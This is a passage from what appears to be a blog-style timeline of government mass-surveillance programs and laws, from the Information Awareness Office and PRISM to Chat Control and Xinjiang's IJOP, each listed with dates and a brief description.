Information Awareness Office sought vast data-integration for pattern analysis; Defunded amid civil-liberties outcry. ThinThread (USA) [2002–2008] ( later Trailblazer ) Competing NSA programs; ThinThread emphasized privacy protections; Trailblazer pursued broader data analysis, ultimately cancelled after overruns/criticism. 
AT&T Room 641A (USA) [2003 (installed) / 2006 (revealed)] Fiber-optic splitter room in San Francisco (Narus gear) enabling backbone interception under NSA partnerships. Operation EIKONAL (Germany/NSA) [2004–2005] BND with NSA tapped Deutsche Telekom Frankfurt switch; Filters proved leaky; Later parliamentary inquiry. Golden Shield (China) [2006] (subsystem Great Firewall ) “Golden Shield Project” integrates policing with internet control; Surveillance and filtering co-develop. EU Data Retention Directive (EU) [2006] Mandated retention of telecom metadata across member states (up to 24 months); Struck down by CJEU in 2014. Hemisphere Project (USA) [2007] AT&T call-records database queried by law enforcement with parallel-construction concerns; Data reaches back decades. BULLRUN / EDGEHILL (USA/UK) [2007] Efforts to defeat encryption standards and implementations via covert influence and exploits. PRISM (USA) [2007 (begins) / 2013 (revealed)] NSA program collecting data from U.S. internet companies under FISA §702 orders. FRA-lagen (Sweden) [2008] Law enabling the National Defence Radio Establishment (FRA) to intercept cross-border cable communications; Amended for more oversight (2009). XKEYSCORE [2008] Distributed search/analysis system for captured internet data; Used by NSA, GCHQ, and partners including BND under agreements. Optic Nerve (UK) [2008] GCHQ bulk-captured Yahoo webcam images (including non-targets) for facial-recognition research. Karma Police (UK) [2008] GCHQ project building web-browsing profiles tied to IP addresses for “behavioural detection.” Tempora build-out (UK) [2008–2011] GCHQ buffer-records fiber traffic at landing stations; Integrated with Five Eyes analytics. GCSB law changes (New Zealand) [2009] Legal reforms later enabled broader assistance to domestic agencies; Subsequent controversies and oversight changes. Mastering the Internet & Global Telecoms Exploitation (UK) [2009] GCHQ capstone initiatives to scale cable tapping and data analytics. MYSTIC (USA) [2009–2014] NSA voice interception of entire countries’ phone calls; Sub-program SOMALGET stored full audio in places like the Bahamas. Royal Concierge (UK) [2010] GCHQ monitoring of hotel booking systems to track diplomats for potential ops. Boundless Informant (USA) [2013] NSA global metadata visualization tool tallying collection by country/source. MUSCULAR (USA/UK) [2013] NSA & GCHQ tapped private Google/Yahoo data-center links overseas; Exploited unencrypted inter-DC traffic (later encrypted by companies). 2010s Global Surveillance Disclosures (worldwide) [2013] Wave of revelations across Five Eyes and partners prompting legislative reforms. CJEU invalidates EU Data Retention Directive (EU) [2014] Digital Rights Ireland decision strikes blanket retention; Many national laws revised or challenged. Project SPEARGUN allegations (New Zealand) [2014] Reports that GCSB sought to tap a trans-Pacific cable and enable bulk metadata flows to NSA. Intelligence Act (France) [2015] Legalized wide surveillance powers (including algorithmic “black boxes” at ISPs) after terror attacks; Provisions for international communications interception. Data Retention Law (Australia) [2015] Mandatory ISP retention of metadata (2 years) for law-enforcement access. China’s Sky Net expansion & early “Sharp Eyes” pilots (China) [2015] Nationwide CCTV with facial recognition, integrating public and private cameras; “Sharp Eyes” pushes village-level coverage. Investigatory Powers Act a.k.a. 
“Snoopers’ Charter” (UK) [2016] Consolidated surveillance authorities (bulk powers, equipment interference), data retention & ISP logging (“internet connection records”). Yarovaya Law (Russia) [2016] Counter-terrorism package mandating retention and decryption assistance by telecoms/online services; Strengthens SORM ecosystem. German BND law reform (Germany) [2016] Legalizes/stipulates foreign-to-foreign cable tapping, introduces oversight changes following EIKONAL fallout. Investigatory Powers Act comes into force (UK) [2016] Bulk powers framework operational with codes of practice. Wiv 2017 (“Sleepwet”) & 2018 referendum (Netherlands) [2017] Intelligence and Security Services Act expanded bulk interception; A 2018 advisory referendum rejected it, prompting tweaks before implementation. China’s Intelligence Law [2017] Compels organizations and citizens to support state intelligence work; Implications for tech firms and data. Assistance and Access Act (Australia) [2018] Technical capability notices and voluntary/compulsory assistance powers targeting encrypted services and devices. Five Eyes Plus [2018] Five Eyes agreements with France, Germany, and Japan to introduce an information-sharing framework to counter China and Russia. CSE Act (Canada) via Bill C-59 [2019] Statutory basis for CSE’s active cyber operations and foreign intelligence, with new oversight/review mechanisms. IJOP & surveillance in Xinjiang (China) [2020s] Integrated Joint Operations Platform aggregates data (checkpoints, apps, biometrics) for risk scoring of Uyghurs and others. SORM-3 (Russia) [Ongoing] Deeper DPI, social media, and traffic metadata capture with localization requirements for providers. Five Eyes / Nine Eyes / Fourteen Eyes / SSEUR bulk collection [Ongoing] Continued §702 reauthorizations (USA) and partner bulk-powers regimes (UK, others) with periodic court/oversight modifications. Chat Control (Europe) [Ongoing] Proposal aiming to combat CSAM by allowing law enforcement to scan private messages, photos, and files, even when content is end-to-end-encrypted; Automatic scanning without consent or suspicion, imposed on all 450 million citizens of the European Union. Domain Awareness System (USA/NYC): Largest digital surveillance system in the world, part of the Lower Manhattan Security Initiative, a partnership between the New York Police Department and Microsoft to monitor New York City. IMSI catchers / Stingrays: Portable cell-site simulators widely used by police and intel services for location/metadata capture. Mail Isolation Control and Tracking (MICT) (USA): USPS photographs exterior of all mail for investigative use. Jingwang Weishi (China/Xinjiang): Mandatory phone-scanning app developed by Shanghai Landasoft Data Technology Inc. reported to extract/report content/signatures. GhostNet (origin linked to China): Operation exposed in 2009 compromising targets in 100+ countries; Espionage network notable in surveillance context. Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program .

0 views